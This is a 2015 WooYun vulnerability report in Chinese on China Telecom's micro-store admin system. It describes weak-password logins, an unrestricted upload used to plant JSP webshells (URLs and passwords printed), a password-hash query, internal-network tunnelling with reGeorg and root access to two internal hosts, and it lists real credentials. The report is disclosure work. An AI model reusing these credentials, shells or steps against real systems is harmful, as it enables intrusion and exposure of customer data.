当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120470

漏洞标题:中国电信微店后台管理系统/弱口令/已shell可内网渗透/可控制2.5W微店/泄露近14W订单

相关厂商:中国电信

漏洞作者: 小饼仔

提交时间:2015-06-14 18:10

修复时间:2015-08-03 12:10

公开时间:2015-08-03 12:10

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-14: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开

简要描述:

蝴蝶效应

详细说明:

1.系统介绍
地址

http://w.189.cn/


2.png


这个系统是中国电信提供给各地营业厅开设微店的,可以进行业务办理、手机选购等功能。
比如常州文化宫中心营业厅

http://w.189.cn/wd/main.do?author=WT16109


1.png


更改参数author的值就可以到其他营业厅的页面。
比如

中国电信蔡锷路厅 http://w.189.cn/wd/main.do?author=WT3813
中国电信上海公园东路营业厅 http://w.189.cn/wd/main.do?author=WT10692
等等


2.漏洞起因
之前发的漏洞
WooYun: 中国电信某站配置不当/已shell/可vpn连接/内网渗透
漏洞证明里有提到这样一段话

因为之前有人已经来过,这里建议你们重置一下老版数据库VPN_USER表登陆密码,还有用户表T_USER_INFO密码明文存储,很多人在不同的站点都用同一个密码,用用户表里面的邮箱账号字段和密码可以成功登陆189邮箱,邮箱里有敏感信息,通知他们都去改密码吧,不然会造成蝴蝶效应的。


从成功登陆的邮箱中获取到,http://w.189.cn/的两个账号,弱口令000000,当时成功登陆了(现在密码已经失效),找到一个地方可以上传文件,没有限制,导致getshell。
2. 证明
拿 常州文化宫中心营业厅 http://w.189.cn/wd/main.do?author=WT16109 来做例子说明
账号密码

WT16109 / 111111


本身就是弱口令
成功登陆

3.png


可修改微店的各种信息,如产品管理

14.png


套餐管理

16.png


等等
点击门店信息,有个上传店铺头像的地方

4.png


没后缀限制,上传shell,返回结果里就有地址

5.png


shell地址

http://w.189.cn/upload/images/20150614_154235124.jsp  
密码 dsgfdsfrewewcgfdasfasdfasdf
因为这个系统有nginx负载均衡,所以连接的时候可能会失败。这里再给一个机器上都有的shell地址
http://w.189.cn/admin/upload/images/20150411_11352641.jsp
密码 sdfasdfkjermnjcjadksfas
如果再失败就重新上传吧


上个菜刀连接

6.png


数据库配置

7.png


用户量 3W+

8.png


测试下弱口令
000000 md5为 670b14728ad9902aecba32e22fa4f6bd

SELECT count(*) FROM WT_USER where MD5PWD='670b14728ad9902aecba32e22fa4f6bd' ORDER BY 1 DESC
4977


00000就有近5000个
微店数量 2.5W+

9.png


订单 近14W

10.png


订单数据,有姓名电话地址

11.png

漏洞证明:

在内网

[/home/wd_web/app/webapps/wtfx_02/admin/upload/images/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 02:00:30:CC:01:0E  
          inet addr:172.16.246.47  Bcast:172.16.246.255  Mask:255.255.255.0
          inet6 addr: fe80::30ff:fecc:10e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:262574821 errors:0 dropped:0 overruns:0 frame:0
          TX packets:274629745 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:120478956360 (112.2 GiB)  TX bytes:198503921192 (184.8 GiB)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:44326 errors:0 dropped:0 overruns:0 frame:0
          TX packets:44326 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:12113369 (11.5 MiB)  TX bytes:12113369 (11.5 MiB)


linux内核可提权

[/home/wd_web/app/tomcat_wd/bin/]$ uname -a
Linux jtwd47 2.6.32-279.el6.x86_64 #1 SMP Wed Jun 13 18:24:36 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux


利用reGeorg反向,可进一步渗透
地址http://w.189.cn/upload/images/20150614_160701772.jsp
已拿下两台服务器root权限

172.16.246.15


12.png


172.16.246.47


13.png


已证明,不再进一步深入

修复方案:

未做破坏
...

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-19 12:09

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发通报,由其后续协网站调管理单位处置.

最新状态:

暂无